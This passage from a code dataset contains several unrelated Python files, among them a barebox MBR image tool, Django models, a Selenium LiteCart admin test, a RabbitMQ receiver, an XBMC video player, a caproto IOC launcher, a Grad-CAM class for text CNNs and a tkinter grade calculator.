return False\n\n rc = fill_daps(DAPS(hd_image, daps_table+i*len(DAPS)), chunk_size / SECTOR_SIZE, offset, segment, lba)\n if not rc:\n print(\"Couldn't fill the DAPS\")\n return False\n\n size -= chunk_size\n i += 1\n lba += chunk_size / SECTOR_SIZE\n offset += chunk_size\n if offset >= 0x10000:\n segment += 4096\n offset = 0\n\n while size:\n if size >= 32 * 1024:\n if i >= (SECTOR_SIZE / len(DAPS)):\n print(\"Internal tool error: Too many DAPS entries!\")\n return False\n rc = fill_daps(DAPS(hd_image, daps_table+i*len(DAPS)), 64, offset, segment, lba)\n if not rc:\n return False\n \n size -= 32 * 1024\n lba += 64\n offset += 32 * 1024\n if offset >= 0x10000:\n segment += 4096\n offset = 0\n i += 1\n else:\n if i >= SECTOR_SIZE / len(DAPS):\n print(\"Internal tool error: Too many DAPS entries!\")\n return False\n rc = fill_daps(DAPS(hd_image, daps_table+i*len(DAPS)), size / SECTOR_SIZE, offset, segment, lba)\n if not rc:\n return False\n size = 0\n i += 1\n else:\n rc = fill_daps(DAPS(hd_image, daps_table+i*len(DAPS)), size / SECTOR_SIZE, offset, segment, lba)\n if not rc:\n return False\n i += 1\n\n if i >= (SECTOR_SIZE / len(DAPS)):\n return True\n\n # mark the last DAPS invalid\n invalidate_daps( DAPS(hd_image, daps_table + i*len(DAPS)) )\n\n return True\n\ndef check_for_valid_mbr(sector, size):\n if size < SECTOR_SIZE:\n print(\"MBR too small to be valid\")\n return False\n if (sector[OFFSET_OF_SIGNATURE] != 0x55) or \\\n (sector[OFFSET_OF_SIGNATURE+1] != 0xAA):\n print(\"No MBR signature found\")\n return False\n return True\n\ndef check_for_space(hd_image, size):\n if not check_for_valid_mbr(hd_image, 
size):\n return False\n\n partition = Partition(hd_image, OFFSET_OF_PARTITION_TABLE)\n\n spare_sector_count = target2host_32( partition.partition_start )\n\n print(\"Debug: Required free sectors for barebox prior first partition: %u, hd image provides: %u\" % (\n (size + SECTOR_SIZE - 1) / SECTOR_SIZE,\n spare_sector_count))\n\n spare_sector_count *= SECTOR_SIZE\n if spare_sector_count < size:\n print(\"Not enough space after MBR to store minibox\")\n print(\"Move begin of the first partition beyond sector %u\" % ((size + SECTOR_SIZE - 1) / SECTOR_SIZE))\n return False\n return True\n\ndef barebox_overlay_mbr(fd_barebox, fd_hd):\n import mmap, os\n sb = os.fstat(fd_barebox.fileno())\n barebox_image = mmap.mmap(fd_barebox.fileno(), 0, access=mmap.ACCESS_READ)\n\n check_for_valid_mbr(barebox_image, sb.st_size)\n\n required_size = sb.st_size\n hd_image = mmap.mmap(fd_hd.fileno(), required_size, access=mmap.ACCESS_WRITE)\n\n check_for_space(hd_image, required_size)\n\n # embed barebox's boot code into the disk drive image\n hd_image[0:OFFSET_OF_PARTITION_TABLE] = barebox_image[0:OFFSET_OF_PARTITION_TABLE]\n\n\t# embed the barebox main image into the disk drive image,\n\t# but keep the persistant environment storage untouched\n\t# (if defined), e.g. store the main image behind this special area.\n hd_image_start = SECTOR_SIZE\n barebox_image_start = SECTOR_SIZE\n size = sb.st_size - SECTOR_SIZE\n hd_image[hd_image_start:hd_image_start+size] = barebox_image[barebox_image_start:barebox_image_start+size]\n\n embed = PATCH_AREA\n indirect = SECTOR_SIZE\n\n fill_daps(DAPS(hd_image, embed), 1, INDIRECT_AREA, INDIRECT_SEGMENT, 1)\n\n rc = barebox_linear_image(hd_image, indirect, sb.st_size)\n if not rc:\n return False\n\n hd_image.close()\n barebox_image.close()\n\ndef main(argv):\n from optparse import OptionParser\n parser = OptionParser()\n parser.add_option(\"-m\", dest=\"barebox_image_filename\",\n help=\"\")\n parser.add_option(\"-d\", dest=\"hd_image_filename\",\n help=\"\")\n\n (options, args) = parser.parse_args(argv)\n\n fd_barebox_image = open(options.barebox_image_filename, \"r+b\")\n fd_hd_image = open(options.hd_image_filename, \"a+b\")\n\n barebox_overlay_mbr(fd_barebox_image, fd_hd_image)\n\n fd_barebox_image.close()\n fd_hd_image.close()\n\nif __name__==\"__main__\":\n import sys\n main(sys.argv[1:])\n","sub_path":"setupmbr.py","file_name":"setupmbr.py","file_ext":"py","file_size_in_byte":9514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"611722868","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django import forms\nfrom django.forms import ModelForm\nfrom django.shortcuts import get_object_or_404, redirect\n\nclass Project(models.Model):\n\tname = models.CharField(max_length = 20)\n\tdescription = models.CharField(max_length = 200)\n\tstart_date = models.DateField()\n\tend_date = models.DateField()\n\towner = models.ForeignKey(User, related_name=\"projects_owner\")\n\tusers = models.ManyToManyField(User, related_name=\"projects_users\")\n\n\tdef __unicode__(self):\n\t\treturn self.name\n\n\tdef user_can_manage(self, owner):\n\t\treturn owner == self.owner \n\n\t@classmethod\n\tdef get_manageable_object_or_404(cls, user, *args, **kwds):\n\t\titem = get_object_or_404(cls, *args, **kwds)\n\t\tif not item.user_can_manage(user):\n\t\t\treturn False\n\t\treturn item\n\n\tdef user_can_see(self, users):\n\t\treturn self.users.filter(id=users.id).exists()\n\n\t@classmethod\n\tdef 
get_showable_object_or_404(cls, user, *args, **kwds):\n\t\titem = get_object_or_404(cls, *args, **kwds)\n\t\tif not item.user_can_see(user):\n\t\t\treturn False\n\t\treturn item\n\n\tclass Meta:\n\t\tpermissions = (\n\t\t\t(\"can_add_projects_web\", \"Can add projects through the web\"),\n\t\t)\n\nclass Status(models.Model):\n\tstatus = models.CharField(max_length = 20)\n\n\tdef __unicode__(self):\n\t\treturn self.status\n\nclass Ticket(models.Model):\n\tname = models.CharField(max_length = 20)\n\tdescription = models.CharField(max_length = 200)\n\tstatus = models.ForeignKey(Status, related_name=\"tickets_status\")\n\tproject = models.ForeignKey(Project, related_name=\"tickets_project\")\n\towner = models.ForeignKey(User, related_name=\"tickets_owner\")\n\n\tdef __unicode__(self):\n\t\treturn self.name\n\n\tdef user_can_manage(self, owner):\n\t\treturn owner == self.owner \n\n\t@classmethod\n\tdef get_manageable_object_or_404(cls, user, *args, **kwds):\n\t\titem = get_object_or_404(cls, *args, **kwds)\n\t\tif not item.user_can_manage(user):\n\t\t\treturn False\n\t\treturn item\n\t\t\n\tclass Meta:\n\t\tpermissions = (\n\t\t\t(\"can_add_tickets_web\", \"Can add tickets through the web\"),\n\t\t)\n\nclass TicketForm(forms.ModelForm):\n\tstatus = forms.ModelChoiceField(queryset=Status.objects.all())\n\tclass Meta:\n\t\tmodel = Ticket\n\t\texclude = ('owner', 'project')\n\t\t\nclass LoginForm(forms.Form):\n\t username = forms.CharField(max_length = 30)\n\t password = forms.CharField(max_length = 128, widget=forms.PasswordInput)\n\n\n\n\n\nclass ProjectForm(ModelForm):\n\tdef __init__(self, user_id, *args, **kwargs):\n\t\tsuper(ProjectForm, self).__init__(*args, **kwargs)\n\t\tself.fields['users'].queryset = \\\n\t\tUser.objects.exclude(id = user_id)\n\tclass Meta:\n\t\tmodel = Project\n\t\texclude = ('owner',)","sub_path":"Projectmanager/project_manager/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"27476009","text":"from selenium import webdriver\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.wait import WebDriverWait\nimport os\n\n\n# 'General' tab\ndef general_tab(driver):\n    # set Status to Enable\n    driver.find_element_by_css_selector(\"div#tab-general input[name=status]\").click()\n    # input Name = \"test product\"\n    driver.find_element_by_css_selector(\"div#tab-general input[name='name[en]']\").send_keys(\"test product\")\n    # enter Code = \"12345\"\n    driver.find_element_by_css_selector(\"div#tab-general input[name=code]\").send_keys(\"12345\")\n    # uncheck Root and check \"Rubber Ducks\" category\n    driver.find_element_by_css_selector(\"div#tab-general input[data-name=Root]\").click()\n    driver.find_element_by_css_selector(\"div#tab-general input[data-name='Rubber Ducks']\").click()\n    # select \"Rubber Ducks\" in Default Category select\n    select = Select(driver.find_element_by_name(\"default_category_id\"))\n    select.select_by_visible_text(\"Rubber Ducks\")\n    # set Gender to \"Unisex\"\n    driver.find_element_by_css_selector(\"div#tab-general input[name='product_groups[]'][value='1-3']\").click()\n    # set Quantity to 12\n    quantity = driver.find_element_by_css_selector(\"div#tab-general input[name=quantity]\")\n    ActionChains(driver).move_to_element(quantity).double_click(quantity).perform()\n    
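# the double-click above selects the field's current value, so the keys sent next replace it\n    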
quantity.send_keys(\"12\")\n ActionChains(driver).move_by_offset(120,120).click().perform()\n # Upload Images from the current directory\n cwd = os.getcwd()\n path = cwd + \"/ball.png\"\n driver.find_element_by_css_selector(\"div#tab-general input[name='new_images[]']\").send_keys(path)\n # set Date Valid From to \"15.11.2016\"\n driver.find_element_by_css_selector(\"div#tab-general input[name=date_valid_from]\").send_keys(\"15.11.2016\")\n # set Date Valid To to \"15.12.2017\"\n driver.find_element_by_css_selector(\"div#tab-general input[name=date_valid_to]\").send_keys(\"15.12.2017\")\n\n\ndef information_tab(driver):\n # select the last element in Manufacturer select\n select = Select(driver.find_element_by_css_selector(\"div#tab-information [name=manufacturer_id]\"))\n select.select_by_index(len(select.options)-1)\n # select the last element in Supplier select\n select = Select(driver.find_element_by_css_selector(\"div#tab-information [name=supplier_id]\"))\n select.select_by_index(len(select.options)-1)\n # input Keyword\n driver.find_element_by_css_selector(\"div#tab-information [name=keywords]\").send_keys(\"test keyword\")\n # enter text \"small ball\" to Short Description\n driver.find_element_by_css_selector(\"div#tab-information [name='short_description[en]']\").send_keys(\"small ball\")\n # enter text to Description text area\n driver.find_element_by_css_selector(\"div#tab-information span.input-wrapper \"\n \"div.trumbowyg-editor\").send_keys(\"This is a ball\")\n # input Head Title\n driver.find_element_by_css_selector(\"div#tab-information [name='head_title[en]']\").send_keys(\"Color Ball\")\n # input Meta Description\n driver.find_element_by_css_selector(\"div#tab-information [name='meta_description[en]']\").send_keys(\"meta\")\n\n\ndef prices_tab(driver):\n # set Purchase Price to 5 US Dollars\n purchase = driver.find_element_by_css_selector(\"div#tab-prices input[name=purchase_price]\")\n ActionChains(driver).move_to_element(purchase).click().send_keys(Keys.UP * 5).perform()\n select = Select(driver.find_element_by_name(\"purchase_price_currency_code\"))\n select.select_by_visible_text(\"US Dollars\")\n # set Price to 5 USD\n driver.find_element_by_css_selector(\"div#tab-prices input[name='prices[USD]']\").send_keys(\"50\")\n\n\n# main part\ndriver = webdriver.Chrome()\ndriver.get(\"http://localhost/litecart/admin/\")\ndriver.find_element_by_name(\"username\").send_keys(\"admin\")\ndriver.find_element_by_name(\"password\").send_keys(\"admin\")\ndriver.find_element_by_name(\"login\").click()\n\n# open Catalog menu\ndriver.find_element_by_css_selector(\"#box-apps-menu a[href$=catalog]\").click()\n\n# click on \"Add New Product\" button\ndriver.find_element_by_css_selector(\"td#content a[href$=edit_product]\").click()\n\n# fill General tab\ngeneral_tab(driver)\n\n# open Information tab\ndriver.find_element_by_css_selector(\"td#content div.tabs ul.index a[href$=tab-information]\").click()\nWebDriverWait(driver, 10)\n# fill Information tab\ninformation_tab(driver)\n\n# open Prices tab\ndriver.find_element_by_css_selector(\"td#content div.tabs ul.index a[href$=tab-prices]\").click()\nWebDriverWait(driver, 10)\n# fill Prices tab\nprices_tab(driver)\n\n# press Save button\ndriver.find_element_by_css_selector(\"td#content span.button-set [name=save]\").click()\nWebDriverWait(driver, 10)\n\n# verify that the added product appears in Catalog\ntable_list = driver.find_elements_by_css_selector(\"td#content table.dataTable tr.row\")\nflag = 0\nfor i in range(len(table_list)):\n if 
table_list[i].text == \"test product\":\n print(\"New product is added to Catalog\")\n flag = 1\n break\nif flag == 0:\n print(\"New product is NOT added to Catalog\")\n\ndriver.quit()\n","sub_path":"12_Add_new_product.py","file_name":"12_Add_new_product.py","file_ext":"py","file_size_in_byte":5169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"18193816","text":"import pika\n\n\ndef callback(ch, method, properties, body):\n print(\" [x] Received %r\" % body)\n\nconnection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\nchannel = connection.channel()\nchannel.queue_declare(queue='queue0', durable=True)\n\nchannel.basic_consume(queue='queue0',\n auto_ack=True,\n on_message_callback=callback)\nchannel.start_consuming()","sub_path":"Receiver.py","file_name":"Receiver.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"598470685","text":"\nimport os\nimport sys\nimport xbmc\nimport xbmcgui\n\nfrom scraper import getVideo\nfrom traceback import print_exc\n\n\n# set our infolabels\ninfoLabels = {\n \"tvshowtitle\": unicode( xbmc.getInfoLabel( \"ListItem.TvShowTitle\" ), \"utf-8\" ),\n \"title\": unicode( xbmc.getInfoLabel( \"ListItem.Title\" ), \"utf-8\" ),\n \"genre\": unicode( xbmc.getInfoLabel( \"ListItem.Genre\" ), \"utf-8\" ),\n \"plot\": unicode( xbmc.getInfoLabel( \"ListItem.Plot\" ), \"utf-8\" ),\n \"Aired\": unicode( xbmc.getInfoLabel( \"ListItem.Premiered\" ), \"utf-8\" ),\n \"mpaa\": unicode( xbmc.getInfoLabel( \"ListItem.MPAA\" ), \"utf-8\" ),\n \"duration\": unicode( xbmc.getInfoLabel( \"ListItem.DUration\" ), \"utf-8\" ),\n \"studio\": unicode( xbmc.getInfoLabel( \"ListItem.Studio\" ), \"utf-8\" ),\n \"writer\": unicode( xbmc.getInfoLabel( \"ListItem.Writer\" ), \"utf-8\" ),\n \"director\": unicode( xbmc.getInfoLabel( \"ListItem.Director\" ), \"utf-8\" ),\n \"season\": int( xbmc.getInfoLabel( \"ListItem.Season\" ) or \"-1\" ),\n \"episode\": int( xbmc.getInfoLabel( \"ListItem.Episode\" ) or \"1\" ),\n \"year\": int( xbmc.getInfoLabel( \"ListItem.Year\" ) or \"0\" ),\n }\n# set our thumbnail\ng_thumbnail = unicode( xbmc.getInfoImage( \"ListItem.Thumb\" ), \"utf-8\" )\n#set our str watched\ng_strwatched = xbmc.getInfoLabel( \"ListItem.Property(strwatched)\" )\n\n\ndef setWatched( listitem ):\n try:\n sys.modules[ 'resources.lib.toutv' ].setWatched( g_strwatched, refresh=False )\n listitem.setInfo( \"video\", { \"playcount\": 1 } )\n except: print_exc()\n\n\nclass XBMCPlayer( xbmc.Player ):\n \"\"\" Subclass of XBMC Player class.\n Overrides onplayback events, for custom actions.\n but onplayback not work with rtmp ! 
:(\n \"\"\"\n def _play( self, url, listitem ):\n xbmc.log( \"TouTvPlayer: \" + url, xbmc.LOGNOTICE )\n self.listitem = listitem\n self.play( url, self.listitem )\n\n def onPlayBackStarted( self ):\n xbmc.log( \"TouTvPlayer::onPlayBackStarted\", xbmc.LOGNOTICE )\n\n def onPlayBackEnded( self ):\n xbmc.log( \"TouTvPlayer::onPlayBackEnded\", xbmc.LOGNOTICE )\n setWatched()\n\n def onPlayBackStopped( self ):\n try: xbmc.log( \"Resume: %r\" % self.getTime(), xbmc.LOGNOTICE )\n except: pass\n xbmc.log( \"TouTvPlayer::onPlayBackStopped\", xbmc.LOGNOTICE )\n\n\nclass TouTvPlayer( XBMCPlayer ):\n def __new__( cls, *args ):\n return XBMCPlayer.__new__( cls, *args )\n\n\ndef playVideo( PID, startoffset=None, strwatched=None, listitem=None ):\n global g_strwatched\n if not g_strwatched and strwatched is not None:\n g_strwatched = strwatched\n\n # set our play path\n rtsp_url = getVideo( PID )\n\n #set listitem\n if listitem is None:\n listitem = xbmcgui.ListItem( infoLabels[ \"title\" ], '', \"DefaultVideo.png\", g_thumbnail )\n listitem.setInfo( \"Video\", infoLabels )\n\n #listitem.setProperty( \"PlayPath\", playpath )\n listitem.setProperty( \"swfUrl\", \"http://lg.tou.tv/SSRtmpPlayer.swf\" )\n listitem.setProperty( \"PID\", PID )\n\n if str( startoffset ).isdigit():\n listitem.setProperty( \"startoffset\", str( startoffset ) ) #in second\n\n # play media\n #player = TouTvPlayer( xbmc.PLAYER_CORE_DVDPLAYER )\n setWatched( listitem )\n player = xbmc.Player( xbmc.PLAYER_CORE_DVDPLAYER )\n player.play( rtsp_url, listitem )\n\n\nif ( __name__ == \"__main__\" ):\n try:\n # get pid\n PID = sys.argv[ 1 ]\n playVideo( PID )\n except:\n print_exc()\n\n","sub_path":"French/plugin.video.tou.tv/resources/lib/TouTvPlayer.py","file_name":"TouTvPlayer.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"118789676","text":"from caproto.server import ioc_arg_parser, run\nfrom caproto.threading import pyepics_compat as epics\nfrom h5py import File as h5file\nfrom satt_app import *\n\n################################################\nprefix = \"AT2L0:SIM\"\nnum_blades = 18\neV_name = \"LCLS:HXR:BEAM:EV\"\npmps_run_name = \"PMPS:HXR:AT2L0:RUN\"\npmps_tdes_name = \"PMPS:HXR:AT2L0:T_DES\"\nabs_data = h5file('../../../absorption_data.h5', 'r')\nconfig_data = h5file('../../../configs.h5', 'r')\n################################################\n\nioc_args = {\n\"absorption_data\" : abs_data,\n\"config_data\" : config_data,\n\"filter_group\" : [str(N+1).zfill(2) for N in range(num_blades)],\n \"eV_pv\" : eV_name,\n \"pmps_run_pv\" : pmps_run_name,\n \"pmps_tdes_pv\" : pmps_tdes_name\n}\n\nif __name__ == '__main__':\n ioc_options, run_options = ioc_arg_parser(\n default_prefix=prefix,\n desc=IOCMain.__doc__)\n\n ioc = create_ioc(\n **ioc_args,\n **ioc_options)\n\n run(ioc.pvdb, **run_options)\n","sub_path":"caproto/ioc-satt-dev/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"131068836","text":"import os\nimport numpy as np\nimport tensorflow as tf\n\n\nclass ClassActivateMap:\n def __init__(self,\n ckpt_fp,\n label2id_dct,\n input_tensor_name_lst,\n conv_layer_tensor_name2filter_size_dct,\n logits_tensor_name=''):\n #\n self.label2id_dct = label2id_dct\n self.id2label_dct = {id_: label_ for label_, id_ in self.label2id_dct.items()}\n self.input_tensor_name_lst = input_tensor_name_lst\n 
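# the logits tensor holds the pre-softmax class scores; its gradients w.r.t. the conv feature maps drive the Grad-CAM weighting below\n        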
self.logits_tensor_name = logits_tensor_name\n self.conv_layer_tensor_name2filter_size_dct = conv_layer_tensor_name2filter_size_dct\n #找到.meta文件\n meta_fp = os.path.join(ckpt_fp, [fp for fp in os.listdir(ckpt_fp) if '.meta' in fp][0])\n #创建一个图\n tf.reset_default_graph()\n self.g = tf.Graph()\n with self.g.as_default():\n saver = tf.train.import_meta_graph(meta_fp)\n #设置session的配置\n config = tf.ConfigProto(device_count={\"CPU\": 1},\n inter_op_parallelism_threads=6,\n intra_op_parallelism_threads=6,\n log_device_placement=False)\n self.sess = tf.Session(graph=self.g, config=config)\n with self.sess.as_default(), self.g.as_default():\n checkpoint = tf.train.latest_checkpoint(ckpt_fp)\n #恢复模型\n if checkpoint:\n saver.restore(self.sess, checkpoint)\n print(\"[INFO] restore from the checkpoint {0}\".format(checkpoint))\n # for t in tf.get_default_graph().as_graph_def().node:\n # print(t.name)\n # 定义输入接口\n self.input_tensor_lst = []\n for tensor_name in self.input_tensor_name_lst:\n self.input_tensor_lst.append(self.g.get_tensor_by_name(tensor_name))\n #定义输出接口\n self.logits = self.g.get_tensor_by_name(self.logits_tensor_name)\n\n def get_conv_out(self, conv_i_name):\n #获取CNN中的filter输出\n return self.g.get_tensor_by_name(conv_i_name)\n\n def get_single_grad_cam(self, label_id, conv_i_name):\n #\n with self.g.as_default():\n #构建一个mask用于获取指定类别的logits值\n mask = tf.one_hot(label_id, depth=len(self.label2id_dct))\n # 0-dim, a scalar\n y_c = tf.reduce_sum(tf.multiply(mask, self.logits))\n # [batch_size, max_sentence_len, 1(input_channels), num_filters], 即logits对CNN中每个filter元素的导数值\n conv_out = self.get_conv_out(conv_i_name)\n grads = tf.gradients(y_c, conv_out)[0]\n # [batch_size, max_sentence_len, 1(input_channels), num_filters]\n grads_norm = tf.div(grads, tf.sqrt(tf.reduce_mean(tf.square(grads))) + tf.constant(1e-5))\n # squeeze axis=0 because batch_size=1, axis=2 because input_channels=1\n # (num_filters,) 对应着CNN中每个filter map的重要性\n alpha_c_k = tf.reduce_mean(tf.squeeze(grads_norm, axis=[0, 2]), axis=0)\n # [batch_size, max_sentence_len, 1] through boardcasting\n L_gradcam = tf.nn.relu(tf.reduce_sum(tf.multiply(conv_out, alpha_c_k), axis=-1))\n #最大值归一化\n L_gradcam = tf.div(L_gradcam, tf.reduce_max(L_gradcam) + tf.constant(1e-5))\n return tf.squeeze(L_gradcam)\n\n\n def get_rank_label(self, feed_dict):\n #获取最大logits\n score = self.sess.run(self.logits, feed_dict)\n score_label_tpl = sorted(zip(score[0], list(self.label2id_dct.keys())), key=lambda x: x[0], reverse=True)\n for sco, label in score_label_tpl:\n print((label, sco))\n # #\n # conv = self.get_conv_out('representation_layer/conv-maxpool-3/relu:0')\n # print('conv output:{}'.format(self.sess.run(conv, feed_dict)))\n return score_label_tpl[0]\n\n\n def get_text_final_cam(self, input_value_lst, target_label, max_sentence_len, true_length):\n #构造输入feed_dict\n feed_dict = dict(zip(self.input_tensor_name_lst, input_value_lst))\n #确定label id\n if target_label == 'top':\n score, label = self.get_rank_label(feed_dict)\n print('the selected label: {}, score:{:.4}'.format(label, 1/(1+np.exp(-score))))\n else:\n label = target_label\n print('the selected label: {}'.format(label))\n #用于累积每个filter map给出的文本片段重要性\n cam = np.zeros(max_sentence_len, dtype=np.float32)\n #用于累积每个文本片段被这些filter map卷积过多少次,该值后面用于归一化\n position_vote_num = np.zeros(max_sentence_len, dtype=np.float32)\n for conv_i_name, filter_size in self.conv_layer_tensor_name2filter_size_dct.items():\n cam_filter_i = self.sess.run(self.get_single_grad_cam(self.label2id_dct[label], conv_i_name), 
feed_dict=feed_dict)\n for i, activation_i in enumerate(cam_filter_i):\n cam[i:i + filter_size] += activation_i\n position_vote_num[i:i + filter_size] += 1\n #卷积数归一化\n cam /= position_vote_num\n #最大值归一化\n cam /= cam.max()\n return cam[:true_length].reshape(1, -1)\n","sub_path":"src/class_activate_map/ClassActivateMap.py","file_name":"ClassActivateMap.py","file_ext":"py","file_size_in_byte":5346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"215948209","text":"from tkinter import * # Imports tkinter package\r\n\r\n\r\n\r\nclass GradeCalc(Tk): # Grade Calculator Class. tkinter is inherited\r\n\r\n def __init__(self, master=None): # Initializer of the GradeCalc class\r\n Tk.__init__(self)\r\n self.master = master\r\n\r\n self.headerFont = (\"Helvetica\", \"12\", \"bold italic\") # Fonts for various areas in the GUI\r\n self.calculateFont = (\"Helvetica\", \"18\", \"bold\")\r\n self.finalFont = (\"Helvetica\", \"24\", \"bold\")\r\n self.finalLetterFont = (\"Helvetica\", \"48\", \"bold\")\r\n self.directionsFont = (\"Times New Roman\", \"10\", \"italic\")\r\n\r\n self.examNumber = 1 # Each section is assigned a number to keep track and label how many there are\r\n self.assignmentNumber = 1\r\n self.labNumber = 1\r\n self.essayNumber = 1\r\n self.quizNumber = 1\r\n self.finalExamNumber = 1\r\n\r\n self.examList = [] # Each section stores its contents in a list\r\n self.assignmentList = []\r\n self.labList = []\r\n self.essayList = []\r\n self.quizList = []\r\n self.finalExamList = []\r\n\r\n self.examWeight = 0 # Each section has a weight, based on it's importance to the overall class score\r\n self.assignmentWeight = 0\r\n self.labWeight = 0\r\n self.essayWeight = 0\r\n self.quizWeight = 0\r\n self.finalExamWeight = 0\r\n\r\n self.something = 0.0 # A variable that is later used to averages can be stored and recalculated\r\n\r\n self.CreateHeadings() # Calls the CreateHeadings function, which creates many of the main parts of the GUI\r\n\r\n self.gradeScale = self.CreateGradeScale() # Calls the CreateGradeScale function which reates the grade scale for the class\r\n\r\n self.directionsPopUp() # Calls the function that shows the directions on top of the grade calculator\r\n\r\n\r\n def CreateHeadings(self): # Creates the main parts of the grade calculator GUI including the section headings and labels\r\n examTitleLabel = Label(self, text='Exams', font=self.headerFont)\r\n examTitleLabel.grid(row=0, column=0, columnspan=2) # Exam Section Title\r\n Label(self, text=\"Exam Weight\").grid(row=1, column=0) # Exam weight label\r\n self.examWeight = Entry(self) # Exam weight entry box\r\n self.examWeight.insert(0, 0) # Default value of 0\r\n self.examWeight.grid(row=1, column=1)\r\n self.btnAddExam = Button(self, text=\"Add Exam\", command=self.addExam) # Add exam button\r\n self.btnAddExam.grid(row=1, column=3, padx=(0, 50))\r\n Label(self, text=\"Exam Title\").grid(row=3, column=0) # Exam column title\r\n Label(self, text=\"Score (Out of 100)\").grid(row=3, column=1) # Score column title\r\n\r\n assignmentTitleLabel = Label(self, text='Assignments', font=self.headerFont) # Assignment Section Title\r\n assignmentTitleLabel.grid(row=0, column=4, columnspan=2)\r\n Label(self, text=\"Assignment Weight\").grid(row=1, column=4) # Assignment weight label\r\n self.assignmentWeight = Entry(self) # Assignment weight entry box\r\n self.assignmentWeight.grid(row=1, column=5)\r\n self.assignmentWeight.insert(0, 0) # Default value of 0\r\n 
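# each section below repeats the same pattern: a weight Entry defaulting to 0, an \"Add\" button, and column titles\r\n        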
self.btnAddAssignment = Button(self, text=\"Add Assignment\", command=self.addAssignment) # Add assignment button\r\n self.btnAddAssignment.grid(row=1, column=7, padx=(0, 50))\r\n Label(self, text=\"Assignment Title\").grid(row=3, column=4) # Assignment column title\r\n Label(self, text=\"Score (Out of 100)\").grid(row=3, column=5) # Score column title\r\n\r\n labTitleLabel = Label(self, text='Labs', font=self.headerFont) # Lab Section Title\r\n labTitleLabel.grid(row=0, column=8, columnspan=2)\r\n Label(self, text=\"Lab Weight\").grid(row=1, column=8) # Lab weight label\r\n self.labWeight = Entry(self) # Lab weight entry box\r\n self.labWeight.grid(row=1, column=9)\r\n self.labWeight.insert(0, 0) # Default value of 0\r\n self.btnAddLab = Button(self, text=\"Add Lab\", command=self.addLab) # Add lab button\r\n self.btnAddLab.grid(row=1, column=11, padx=(0, 20))\r\n Label(self, text=\"Lab Title\").grid(row=3, column=8) # Lab column title\r\n Label(self, text=\"Score (Out of 100)\").grid(row=3, column=9) # Lab column title\r\n\r\n essayTitleLabel = Label(self, text='Essays', font=self.headerFont) # Essay Section Title\r\n essayTitleLabel.grid(row=20, column=8, columnspan=2, pady=(50, 0))\r\n Label(self, text=\"Essay Weight\").grid(row=21, column=8) # Essay weight label\r\n self.essayWeight = Entry(self) # Lab weight entry box\r\n self.essayWeight.grid(row=21, column=9)\r\n self.essayWeight.insert(0, 0) # Default value of 0\r\n self.btnAddEssay = Button(self, text=\"Add Essay\", command=self.addEssay) # Add essay button\r\n self.btnAddEssay.grid(row=21, column=11, padx=(0, 20))\r\n Label(self, text=\"Essay Title\").grid(row=22, column=8) # Essay column title\r\n Label(self, text=\"Score (Out of 100)\").grid(row=22, column=9) # Essay column title\r\n\r\n quizTitleLabel = Label(self, text='Quizzes', font=self.headerFont) # Quiz Section Title\r\n quizTitleLabel.grid(row=20, column=0, columnspan=2, pady=(50, 0))\r\n Label(self, text=\"Quiz Weight\").grid(row=21, column=0) # Quiz weight label\r\n self.quizWeight = Entry(self) # Quiz weight entry box\r\n self.quizWeight.grid(row=21, column=1)\r\n self.quizWeight.insert(0, 0) # Default value of 0\r\n self.btnAddQuiz = Button(self, text=\"Add Quiz\", command=self.addQuiz) # Add quiz button\r\n self.btnAddQuiz.grid(row=21, column=3, padx=(0, 20))\r\n Label(self, text=\"Quiz Title\").grid(row=22, column=0) # Quiz column title\r\n Label(self, text=\"Score (Out of 100)\").grid(row=22, column=1) # Score column title\r\n\r\n finalExamTitleLabel = Label(self, text='Final Exam', font=self.headerFont) # Final Exam Section Title\r\n finalExamTitleLabel.grid(row=20, column=4, columnspan=2, pady=(50, 0))\r\n Label(self, text=\"Final Exam Weight\").grid(row=21, column=4) # Final Exam weight label\r\n self.finalExamWeight = Entry(self) # Final Exam weight entry box\r\n self.finalExamWeight.grid(row=21, column=5)\r\n self.finalExamWeight.insert(0, 0) # Default value of 0\r\n self.btnAddFinalExam = Button(self, text=\"Add Final Exam\", command=self.addFinalExam) # Add final exam button\r\n self.btnAddFinalExam.grid(row=21, column=7, padx=(0, 20))\r\n Label(self, text=\"Final Exam Title\").grid(row=22, column=4) # Final Exam column title\r\n Label(self, text=\"Score (Out of 100)\").grid(row=22, column=5) # Score column title\r\n\r\n finalGradeTitleLabel = Label(self, text=\"Final Grade\", font=self.headerFont) # A label that says \"Final Grade\"\r\n finalGradeTitleLabel.grid(row=20, column=15, columnspan=2)\r\n\r\n self.calculateClassScore = Button(self, 
